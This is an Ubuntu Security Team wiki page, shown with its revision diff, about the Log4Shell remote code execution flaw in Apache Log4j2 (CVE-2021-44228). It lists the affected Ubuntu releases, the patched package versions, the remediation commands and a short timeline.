Log4Shell
|
Size: 3832
Comment:
|
Size: 3381
Comment: corrected 16.04 name
|
| Deletions are marked like this. | Additions are marked like this. |
| Line 3: | Line 3: |
| == Remote code execution in Apache Log4j 2 (CVE-2021-44228 [aka Log4Shell]) == | == Remote code execution in Apache Log4j 2 (CVE-2021-44228 aka Log4Shell) == |
| Line 15: | Line 15: |
| This issue was fixed in Apache Log4j2 in 2.15.0. Ubuntu 16.04 ESM, 18.04 LTS, 20.04 LTS, 21.04 and 21.10 were affected. To address the issue, ensure that appropriate versions of the `apache-log4j2` source package is installed, as listed below. These updates were announced in [[https://ubuntu.com/security/notices/USN-5192-1|USN 5192-1]] and [[https://ubuntu.com/security/notices/USN-5197-1|USN-5197-1]]. | This issue was fixed in Apache Log4j2 in 2.15.0. Ubuntu 16.04 LTS, 18.04 LTS, 20.04 LTS, 21.04 and 21.10 were affected. To address the issue, ensure that appropriate versions of the `apache-log4j2` source package is installed, as listed below. These updates were announced in [[https://ubuntu.com/security/notices/USN-5192-1|USN 5192-1]] and [[https://ubuntu.com/security/notices/USN-5197-1|USN-5197-1]]. |
| Line 17: | Line 17: |
| NOTE: for Ubuntu 16.04 ESM, a Ubuntu Advantage subscription which provides access to ESM Apps is required as this update for `apache-log4j2` is available only via ESM Apps not ESM Infra. | |
| Line 24: | Line 23: |
| || 16.04 ESM || [[ https://launchpad.net/ubuntu/+source/apache-log4j2/ | apache-log4j2 2.4-2ubuntu0.1~esm1 ]] || | || 16.04 LTS || [[ https://launchpad.net/ubuntu/+source/apache-log4j2/ | apache-log4j2 2.4-2ubuntu0.1~esm1 ]] || |
| Line 32: | Line 31: |
| === How to fix in Ubuntu === Type in a terminal: {{{ $ sudo ua fix USN-5192-1 $ sudo ua fix USN-5197-1 }}} |
|
| Line 38: | Line 45: |
| === Products affected === These Canonical products contain components that are affected by this vulnerability. * [[https://ubuntu.com/security/CVE-2021-44228|Ubuntu Server]] === Products not affected === These Canonical products have been verified to not be affected by this vulnerability. * Charmed Kubernetes / microk8s * Charmed OpenStack * Anbox cloud |
Remote code execution in Apache Log4j 2 (CVE-2021-44228 aka Log4Shell)
It was discovered that Apache Log4j2 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
In Ubuntu, Apache Log4j2 is packaged under the apache-log4j2 source package.
This issue was fixed in Apache Log4j2 in 2.15.0. Ubuntu 16.04 LTS, 18.04 LTS, 20.04 LTS, 21.04 and 21.10 were affected. To address the issue, ensure that appropriate versions of the apache-log4j2 source package is installed, as listed below. These updates were announced in USN 5192-1 and USN-5197-1.
Release |
apache-log4j2 Version |
21.10 |
|
21.04 |
|
20.04 LTS |
|
18.04 LTS |
|
16.04 LTS |
NOTE: Since Apache Log4j2 2.15.0 is deemed binary compatible with previous versions, to remediate this vulnerability for Ubuntu versions >= 20.04 LTS, apache-log4j2 was upgraded to the new upstream version 2.15.0. However, for Ubuntu 18.04 LTS to avoid the risk of regressions due to a larger upgrade of functionality from this new version, it was decided to remediate this vulnerability by removing the affected java/org/apache/logging/log4j/core/lookup/JndiLookup class entirely. This has the effect of disabling JNDI lookups for that release.
How to fix in Ubuntu
Type in a terminal:
$ sudo ua fix USN-5192-1 $ sudo ua fix USN-5197-1
CVEs
Timeline
- 2021 Dec 09: Vulnerability is publicly known
- 2021 Dec 13: Updated packages for Ubuntu 18.04 LTS, 20.04 LTS, 21.04 and 21.10 are released
- 2021 Dec 14: USN-5192-1 is published, announcing the availability of updated packages
SecurityTeam/KnowledgeBase/Log4Shell (last edited 2025-04-17 11:37:15 by lucistanescu)